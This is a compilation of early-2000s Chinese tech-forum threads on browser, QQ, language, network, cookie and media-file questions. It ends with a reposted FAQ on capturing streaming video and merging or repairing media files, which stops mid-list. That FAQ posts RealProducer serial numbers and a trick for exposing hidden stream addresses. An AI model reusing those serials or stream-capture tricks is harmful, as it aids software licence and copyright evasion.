注册：2000-06-17
 发表于 2002-03-03 14:10:07 按此观看未注册的个人资料 按此发邮件给未注册 访问未注册的主页 发送悄悄话给未注册 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看未注册的IP
装两个IE，我记不清楚在那里看过技术文档的，说IE5开始可以装多个高版本的IE的。

该用户未注册，没有签名。

Blueidea Web Team.
Moderator Of Fireworks Forum.

DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2002-03-03 19:04:11 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
不可能的

木有签名#@$%
Cinkey

我和我追逐的梦
积分：1138
发帖：2440
来自：杭州
注册：2001-06-21
 发表于 2002-03-03 19:06:17 按此观看Cinkey的个人资料 按此发邮件给Cinkey 访问Cinkey的主页 Cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给Cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Cinkey的IP
那有人成功过吗？

 悠 長 假 期   |  反恐联盟  |  CS服务器状态查看
cvbfight

高级用户
积分：256
发帖：66
来自：
注册：2002-02-09
 发表于 2002-03-03 20:23:53 按此观看cvbfight的个人资料 按此发邮件给cvbfight 发送悄悄话给cvbfight 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cvbfight的IP
保留原iexplorer.exe（如5.0）再装ie6试试看，如果打开原ie是５，而新的是６不就成了。

不懂什么，就喜欢插嘴。
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-03-03 23:26:56 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
1、取消自动检测版本号或者在注册表里将IE版本降低；

2、选择“自定义安装”

OK～

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

上一贴 | 下一贴
快速回复 主题：我记得说是从IE5开是，一个操作系统里可以装多个版本的浏览器
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


oicq 的问题... - 经 典 论 坛

计算机技术
oicq 的问题...

上一贴 | 下一贴
发表人 | 主题: oicq 的问题...
birdbird 初级用户 积分：132 发帖：44 来自： 注册：2001-12-06 | 发表于 2002-03-05 16:03:26 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP 我装的WIN2K，新装了QQ2000，结果IE收藏夹里每个网址前的图标都变成了腾讯标志，看着让人烦，怎么恢复啊？
蓝色 管理员|蓝色 积分：13927 发帖：6011 来自：China 注册：2000-06-16 | 发表于 2002-03-05 16:04:50 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP 超级兔子魔法设置，可以修复。 我错了，以前我是死不承认，现在需要常常认错。 认错后，再听那掠过林梢的歌唱。 Blueidea Web Team Team Leader
birdbird 初级用户 积分：132 发帖：44 来自： 注册：2001-12-06 | 发表于 2002-03-05 16:28:47 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP 搞定。 多谢！ 我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
sony 终级用户 积分：1222 发帖：329 来自：浙江省 注册：2001-10-05 | 发表于 2002-03-05 16:33:25 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP 又学到不少 许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
piety 终级用户 积分：737 发帖：210 来自：www.piccool. 注册：2001-09-03 | 发表于 2002-03-05 18:04:40 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP 哪有人还用原版的QQ呀 人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
上一贴 | 下一贴
快速回复 主题：oicq 的问题...
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何安装显示日文的组件？？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
如何安装显示日文的组件？？

上一贴 | 下一贴
发表人 | 主题: 如何安装显示日文的组件？？
zy2003 超级用户 积分：417 发帖：154 来自： 注册：2001-10-09 | 发表于 2002-03-12 14:56:16 按此观看zy2003的个人资料 按此发邮件给zy2003 收藏该主题供以后查看 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP win2000，以前winME是浏览日文网页时有提示安装的 现在不提示，但看日文网站还是一堆乱码，如何安装？？ 我有2000光盘，但在安装组件找不到 [img]http://51abc.net/banner/banner2.gif[/img]
浸食·花葬 极度色郎 积分：7812 发帖：2959 来自：|翅膀| 注册：2001-07-09 | 发表于 2002-03-12 15:19:01 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP 控制面板 - 區域選項 - 系統語言設定 把 繁體中文 日文 都選上 ~ 韓文還有其他得自己看著版 幕末 —— 京都に人斬り拔刀齋と呼ばれた志士がぃた. 修羅さながらに人を斬り.その血刀を以って新 時代『明治』を切り拓ぃたその男は.動亂の 終結と共に人々の前から姿を消した ——
zy2003 超级用户 积分：417 发帖：154 来自： 注册：2001-10-09 | 发表于 2002-03-12 16:05:21 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP 浸食·花葬，太感谢了，哈哈，原来你的签名都是乱码的，现在好了：） 不过韩文是没有的，只有朝鲜文，呵呵 我在工具/internet选项/常规中也发现了有个语言选项，不知道是干什么用的？？ [img]http://51abc.net/banner/banner2.gif[/img]
浸食·花葬 极度色郎 积分：7812 发帖：2959 来自：|翅膀| 注册：2001-07-09 | 发表于 2002-03-12 16:32:01 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP 在interner選項裏面加上以後 在ie得 察看 - 編碼 - 裏面自動加上了 ie會自動識別選擇需要得已有得編碼 ~ 幕末 —— 京都に人斬り拔刀齋と呼ばれた志士がぃた. 修羅さながらに人を斬り.その血刀を以って新 時代『明治』を切り拓ぃたその男は.動亂の 終結と共に人々の前から姿を消した ——
zy2003 超级用户 积分：417 发帖：154 来自： 注册：2001-10-09 | 发表于 2002-03-12 17:14:15 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP 嗯，不过要是没在区域选项装那种语言（如日文）的话， 就算在编码里选这种语言（如日文），也不能正确显示 补充一点，网页要有 <meta HTTP-EQUIV=Content-Type content="text/html; charset=gb2312"> 这句才会选择指定的编码 没有的话就是默认编码 [img]http://51abc.net/banner/banner2.gif[/img]
上一贴 | 下一贴
快速回复 主题：如何安装显示日文的组件？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


一个问题，不好意思，救人一命吧！ - 经 典 论 坛

计算机技术
一个问题，不好意思，救人一命吧！

上一贴 | 下一贴
发表人 | 主题: 一个问题，不好意思，救人一命吧！
早起的虫子 初级用户 积分：37 发帖：12 来自：山东 注册：2001-01-22 | 发表于 2001-12-19 11:47:53 按此观看早起的虫子的个人资料 按此发邮件给早起的虫子 早起的虫子 的 oicq 是161196,查看 161196 的资料 收藏该主题供以后查看 发送悄悄话给早起的虫子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看早起的虫子的IP 我这里是ADSL，有固定IP，我用的是windows2000server，想自己做个网站的， 可是现在有个问题很是困扰我，还请各位大哥帮帮忙啊！！ 我的机子IP是10.8.0.75，网关10.0.0.1 子网掩码是255.0.0.0 IIS默认目录是 [image] :\myweb d:\myweb\index.asp 现在的问题是在我的机子打上10.8.0.75能看到index.asp上的内容，在局域网内也能看 到 可是在别的地方却看不到，提示找不到服务器 各位帮下忙看看是什么原因呢？ 我怀疑是不是网关跟子网掩码有关呢？
mmkk 我是谁 积分：8346 发帖：2507 来自：FJ,China 注册：2001-04-04 | 发表于 2001-12-19 12:01:07 按此观看mmkk的个人资料 按此发邮件给mmkk mmkk 的 oicq 是35262348,查看 35262348 的资料 发送悄悄话给mmkk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mmkk的IP 到计算机技术版问吧 本头像由诺婷提供^^！ 高兴就好
Fly Developer 积分：4146 发帖：1028 来自： 注册：2001-10-31 | 发表于 2001-12-19 19:27:22 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP 你说的用ADSL是通过局域网的代理服务器，接入INTERNET吧，如果是这样的话，你的IP外界是访问不到的，也就是说这是你内部网络的IP 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
上一贴 | 下一贴
快速回复 主题：一个问题，不好意思，救人一命吧！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


Cookie可以备份吗？ - 经 典 论 坛

计算机技术
Cookie可以备份吗？

上一贴 | 下一贴
发表人 主题: Cookie可以备份吗？
Carl

Violinist
积分：2716
发帖：1135
来自：安徽，合肥
注册：2000-12-28
 发表于 2001-12-26 14:08:15 按此观看Carl的个人资料 按此发邮件给Carl 访问Carl的主页 收藏该主题供以后查看 发送悄悄话给Carl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Carl的IP
想重做系统了，但是又不想去回忆那些一大堆的用户名和密码，怎么将Cookie备份一下呢？

╰○︿
  ︿ )
    (
northice

终级用户
积分：545
发帖：477
来自：来的地方
注册：2001-02-22
 发表于 2001-12-26 17:24:19 按此观看northice的个人资料 按此发邮件给northice northice 的 oicq 是3418177,查看 3418177 的资料 发送悄悄话给northice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看northice的IP
WINDOWS/COOKIES里的，
既然删了就要重新登录了，想必只要把它保留就可以的
把COOKIE文件备份一下应该可以，我想

YOU MUST GO,OR YOU WILL BE SAD!
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2001-12-26 17:30:23 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
Internet Explorer 的导出功能。
carl

Violinist
积分：2716
发帖：1135
来自：安徽，合肥
注册：2000-12-28
 发表于 2001-12-27 09:04:45 按此观看carl的个人资料 按此发邮件给carl 访问carl的主页 发送悄悄话给carl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看carl的IP
Bee007在上个帖子中说
引用:
Internet Explorer 的导出功能。

明白了，Netscape一定也有这功能！

╰○︿
  ︿ )
    (
上一贴 | 下一贴
快速回复 主题：Cookie可以备份吗？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可

上一贴 | 下一贴
发表人 | 主题: 请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可
soandy 初级用户 积分：69 发帖：23 来自：广东省 注册：2001-12-21 | 发表于 2001-12-22 02:48:48 按此观看soandy的个人资料 按此发邮件给soandy 访问soandy的主页 soandy 的 oicq 是3709178,查看 3709178 的资料 收藏该主题供以后查看 发送悄悄话给soandy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看soandy的IP 请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可以压到吗？ soandy
freedog 初级用户 积分：0 发帖：21 来自： 注册：2001-12-14 | 发表于 2001-12-22 03:48:35 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP 可以！ I am a freedog！
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2001-12-22 14:59:49 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 还是来些专业软件吧： Exact Audio Copy + Lame
gate 初级用户 积分：22 发帖：25 来自：浙江 注册：2001-10-30 | 发表于 2001-12-26 15:49:17 按此观看gate的个人资料 按此发邮件给gate 发送悄悄话给gate 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gate的IP AudioCatalyst 享受每一天！
胸口别朵大红花 乱 步 管理员 积分：3989 发帖：2156 来自：TOPIDEA.ORG 注册：2000-09-19 | 发表于 2001-12-26 17:21:32 按此观看胸口别朵大红花的个人资料 按此发邮件给胸口别朵大红花 访问胸口别朵大红花的主页 胸口别朵大红花 的 oicq 是2148860,查看 2148860 的资料 发送悄悄话给胸口别朵大红花 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看胸口别朵大红花的IP 超级解霸里使用音频解霸播放VCD，录音即可 Blueidea Web Team Team Housekeeper
上一贴 | 下一贴
快速回复 主题：请问如何将VCD的歌压成MP3的歌？用什么软件压的超级解霸可
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


realplayer播放器的插件存在什么地方了？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
realplayer播放器的插件存在什么地方了？

上一贴 | 下一贴
发表人 | 主题: realplayer播放器的插件存在什么地方了？
birder 终级用户 积分：634 发帖：270 来自： 注册：2001-06-19 | 发表于 2002-01-15 09:42:23 按此观看birder的个人资料 按此发邮件给birder birder 的 oicq 是68656054,查看 68656054 的资料 收藏该主题供以后查看 发送悄悄话给birder 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birder的IP 安装了realplayer播放电影，有时提示需要某种插件支持， 如果可以上网的话可以直接下载下载，自动安装。 但对于局域网的用户来说就不行了， 不知道这些插件存在哪个文件夹下面了， 如果可以找到，是不是把插件直接拷到另一台机子上,这样别人也可以实现插件升级了？ 在荆棘中放歌~~
令狐瓜子 9sun 管理员 积分：5482 发帖：1520 来自：南京 注册：2000-07-07 | 发表于 2002-01-15 09:58:52 按此观看令狐瓜子的个人资料 按此发邮件给令狐瓜子 令狐瓜子 的 oicq 是15998803,查看 15998803 的资料 发送悄悄话给令狐瓜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看令狐瓜子的IP c:\Program Files\COMMON Files\REAL\Plugins 独孤八剑 Blueidea Web Team. Moderator Of Flash Forum
上一贴 | 下一贴
快速回复 主题：realplayer播放器的插件存在什么地方了？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请高手指点如何把在线试听的歌曲保留下来？ - 经 典 论 坛

计算机技术
请高手指点如何把在线试听的歌曲保留下来？

上一贴 | 下一贴
发表人 主题: 请高手指点如何把在线试听的歌曲保留下来？
jammee

超级用户
积分：328
发帖：252
来自：胜利油田
注册：2001-08-27
 发表于 2002-02-15 21:48:53 按此观看jammee的个人资料 按此发邮件给jammee 访问jammee的主页 jammee 的 oicq 是28675282,查看 28675282 的资料 收藏该主题供以后查看 发送悄悄话给jammee 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jammee的IP
http://www.btmusic.com/video/audio_player.html
我很喜欢这个电子音乐网站的精彩的电子音乐，但是我没有办法把这些只能在线试听的歌曲保留下来，请各位高手指点一二~ 多谢！！！

http://www.gjjc.com 矢量图大全
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-15 22:25:52 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
用StreamBox

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-16 16:51:18 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
是的！
去下一个吧！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-02-16 17:46:49 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

http://nowok.net/souxin/software/StreamboxvcrSuite1.zip

用这个

[分享] 破解在线电影技巧 【收藏 道具】

--------------------------------------------------------------------------------
在有的网站的在线电影是弹出一个页面，那镶了一个real的播放器，看不到下载的地址，有一个很笨但是很有效的方法可以看到rtsp地址，就是【断线】，虽然很简单，但是很有效，起码可以下载下来本地观看了！具体方法如下

可以用这个地址做试验

http://www.2655656.cn/movie/play.asp?id=428 （假设）

进入页面以后先暂停，如果是通过网卡上网（如cable）的化，在win98（2k不行）的开始运行菜单里面输入winipcfg然后回车，会出现一个“ip配置”，然后按播放键，等到播放的的缓冲进度刚刚出来的时候就按“ip配置”对话框中的“全部释放”，这样就断线了，就会出现rtsp地址，原理很简单，就是让网页找到要播放的以后断线，软件会报搞出错，有了出错的地址就可以下载了！大家试试吧！
这样虽然很简单，但是很有效，大多数都可以用这个方法，大家不要忘记了，把一些片子都贴上来，一起分享吧！

结合实例来说明，比如《甲方乙方》。
推荐使用netcaptor浏览器，点击在线收看的上集，这时会弹出一个窗口，然后点菜单—＞查看—＞源文件就可以看到源程序，将链接“PlayerStyle/Player03/VodPlay_Player.asp?id=430”取过来与“http://www.444444444444444.com/movie/”合并，即得到播放文件：“http://www.444444444444444444444.com/movie/PlayerStyle/Player03/VodPlay_Player.asp?id=430”。用flashget或netants之类的下载工具将之下载，再用记事本之类的工具打开，就可以找到真正的影片文件的地址了：rtsp://vod.4444444444444.com/喜剧片/甲方乙方/A.rm

（以上网址均为假设）

常见问题解答（十全大补） （转载自打鸟人）

关于文件合并的方法（对于不同文件可能有不同的效果请大家首先注意这一点）：

一。mpg文件：

1.51xz推荐：copy/b file.mpg [注：这种方法适用于相同码率的mpg文件合并，但不同码率的mpg文件合并后会出现文件大小合并了，但只能看到第一个文件的内容，所以合并后要仔细检查］
2.用超级解霸的工具集中unitempeg：点击后会出现一个界面，在输入项按顺序选择待合并的文件名，再在输出栏输入输出文件名点开始即可。［注：原理同上，但不同码率的mpg文件它会拒绝合并，对一般使用者较适合］
3.jonny兄推荐：M1-edit Pro 效果最好 ifilm 1.45 简单易用［注：无论mpg文件的码率是否相同都能合并，适合不同码率的mpg文件合并剪裁］

二。001。002。等分割文件：

1。hj-split 2.x-split 执行后都会出现一个split(分割)和一个join(合并)菜单，需要分割时选择文件再输入分割文件大小，系统自动开始分割，从001开始，需要合并时点合并键，系统会让你选择或输入待合并的第一个即＜.001＞文件，只要你选择正确，系统会自动将选择目录下的所有文件合并！

［注：合并的时候一定要把所有要合并的文件放在同一目录下面］

三。rm文件：

目前只看到一种，斑竹和老解决提供的realproducer,英文版，很有效，文件大小6324K，有些名相同但里面内容不同，安装时得有序列号：212-09483-1266（最早由jonny兄提供），先选择第一个文件后，再点file菜单中的append(版本不对没有这项功能）添加第二个文件，合并完后再继续第三个第四个等，最后保存文件。

［注：要用realproducer plus而不是realproducer basic］

下载地址及序列号（仅供参考）
http://newhua.infosail.com/down/RealProducer_8.5_Setup.exe
RealProducer Plus 8.5正式版 由Real公司所出的Real格式文件制作工具。sn:212-08976-3639

四。asf文件的合并：

老解决提供两种办法：1。[晕倒死] me中的movie maker，但我没用过 2。ppj-asfcuter(名字我记不太清了），文件大小4755K，安装后在所安装的目录中看不到，实际上执行文件安装到[晕倒死] 目录中，文件名ppjasf ,文件大小100K，执行时需转到dos状态，命令： ppjasf ＜输出文件名＞ ＜文件1＞ ＜文件2＞ ＜文件3＞。

注：1. movie maker是重新编码合并的，时间比较长，一般的简单合并不推荐使用。适合不同码率的asf文件合并
2. ppjasf我使用过几次，经常都会出现错误而不成功（不知道是否因为什么原因，和别人交流过他们也有同样的现象），因此不建议使用。（但别急于把它删除，因为后面的wmv它倒是有用）
3. 呵呵，说了这么多都是为了介绍这个。推荐使用ASFCut 2.0 beta 1（注意要这个版本才可以，切记）和ASFCutGUI 1.0（ASFCut 的图形XXXX作界面接口程序）吧，在搜新网上有

下载地址 : http://cool.sj.net.cn/~souxin/software/asfcutgui.zip
http://cool.sj.net.cn/~souxin/software/asfcut_20_beta1.zip
］
五。avi文件的合并：virtuaii_d.exe ,用法：选文件，点附加，最后保存。

六。还有一个wmv（记不清了）的文件，老解决也提供有，但刚才找半天没找到，回头由他解答吧！

［注：1. 我用ppjasf合并的wmv能成功（我在[晕倒死] 2000下XXXX作合并后每次都产生错误日志，不影响别管它），但是看是没问题，就是不能拖动进度条。如果不介意这点就用它吧，速度快！
2. 如果要完美的合并，就还是用[晕倒死] me中的movie maker吧，毕竟是[M$]定立的标准嘛。哈哈］

4。如何解决 Midia Player不能放avi文件的问题?

1.下载Divx插件
2.我的经验供你参考：我也不太清楚mpeg4是做什么用的，但机器重装后不能放有些文件时装上它就能放了！
［注：mpeg4是一种能将影片压缩成近乎DVD质量的压缩方式］

五。关于jetcar和flashget中多填加多任务的办法

在上述两个软件的任务栏中都有两项：新增下载任务（单个文件下载）和添加成批任务两项，而添加成批文件时有一个前提：要下载的多个文件必须在同一地址，否则只能采用新增下载任务下载！成批文件下载主要用于分割文件的下载！下面以下载http://201.10.1.5/ggwsss.mpg.001~201为例说明用法。
先将上面地址复制，然后选择成批文件下载后会出现一个窗口，需填写四项：url、通配符开起序号、终止序号、通配符长度。点击右键选择粘贴将复制的地址复制到url栏，然后将后面的001~201改为(*),在开始序号中填入1，在终止序号中填入201，将通配符设为3位，最后点确定结束，这样地下载任务栏就会出现201个任务。
最后再提醒一点：近段出现不同的文件分割方式，分割时不像x-split和hj-split那样分割为后缀等位的文件，如分割成xxx.1,xxx.2,......xxx.10,xxx.11,....xxx.100,xxx999,......等，这时就得根据文件个数将所有文件分成几个成批文件下载，即后缀1-9为一批，10-99为一批100-999为一批，相应地通配符设为1，2，3.....

［注：jetcar和flashget是同一个软件，开始叫jetcar，后来改名为flashget。

作点补充： 如果网页已经列出了全部的地址,你可以用复制Url的功能:你选择好网页列出了的全部地址,接着复制(Ctrl+C),那样flashget就会列出一个Url的列表（有时候flashget没有列出，你只要打开flashget后按粘贴(Ctrl+V)就会弹出）,在每个地址左方有个选择框,你把要下的就打勾,然后按确定,哈哈,它就开始批量下载了］

六。RM修复软件(老解决) ：你一定有这样的经历：下的rm文件虽然可以播放，但进度条不能拖动。这说明你下的文件不完整。怎么办？这个软件可以帮你忙！

下载地址

http://gk2.gau.hu/~black/rmfix/rmfix.exe

使用说明：

要点：rmfix可能会对rm文件造成永久性损坏，所以在使用rmfix之前把要修复的rm文件做备份。

第一种情况：一个完整的rm文件，但只能播放一部分

1：把rm文件拖拽到rmfix程序图标上(注：也可以命令行方式，例如："rmfix c:\\movie\\a.rm")
2：这时候rmfix会以dos模式运行并显示出一个菜单，按"A"键切换到自动修复模式。
3：按"2"开始检查所有的数据块，rmfix开始扫描整个文件(需要扫描几分钟时间)
4：当rmfix扫描到一个损坏的数据块的时候，扫描会暂停，按"Y"修复这个块。
5：当数据块扫描全部结束时(按回车键回到主菜单)，按"5"开始重建索引数据(注：播放rm文件无法拖拽时间条就是因为索引数据出错)

现在这个rm文件就能够正常播放了。

第二种情况：修复一个不完整的rm文件(例如一个没有下载完全的rm文件)

1：把rm文件拖拽到rmfix程序图标上(注：也可以命令行方式，例如："rmfix c:\\movie\\a.rm")
2：按"C"开始数据块扫描。
3：当rmfix扫描到一个损坏的数据块的时候，扫描会暂停，按"Y"修复这个块。
4：数据块扫描完成的时候rmfix程序结束，这时再次把rm文件拖拽到rmfix程序图标上。
5：按"R"重建索引数据(有索引数据的rm文件在播放的时候才允许使用快进、重放、时间条拖放等控制功能)

(问)：你老哥好运，我下的rmfix.exe一运行就进“dos”还提示说要命令符。真是见脆了。你能将使用的这东西给我一份吗。
(wru1228答)：兄弟你没下错啊，就是这个。用法是：先进入dos状态下，后进入rmfix的目录下运行 rmfix　*:\\****\\****.rm 第一个星号代表的是盘符，也就是你rm文件所在的盘，后边的一排星号代表的是所在目录和文件名。运行后就按R键，更简单的方法是在[晕倒死] 下把要修复的图标直接拖放到rmfix的图标上然后在弹出的命令框里面按R，就可以等它自己运行了

七。asf转avi方法：由于格式的原因,ASF文件要比同样内容的AVI文件"虚胖"很多,而且可以编辑ASF文件的工具也很少,因此有必要把ASF文件转换为AVI文件.

1. 下載 VirtualDub 并安裝
http://w1.463.telia.com/~u46307158/extfaq/software/vdub13c.zip
2.File ＞ Open vedio file ＞ 你要轉換的.asf 檔。
3.Vedio ＞ Direct Stream Copy
4.Audio ＞ Full Processing Mode
5. File ＞ Save AVI... ＞ 新avi 名字和路徑
6. 轉換完成!

注意:在转换比较大的ASF文件的时候,一定要保证系统有足够的内存或交换文件,否则会导致Virtual-Dub崩溃.在http://www.souxin.com有关于Virtual-Dub的更多详细说明.

八。如何一次观看多个rm 文件？

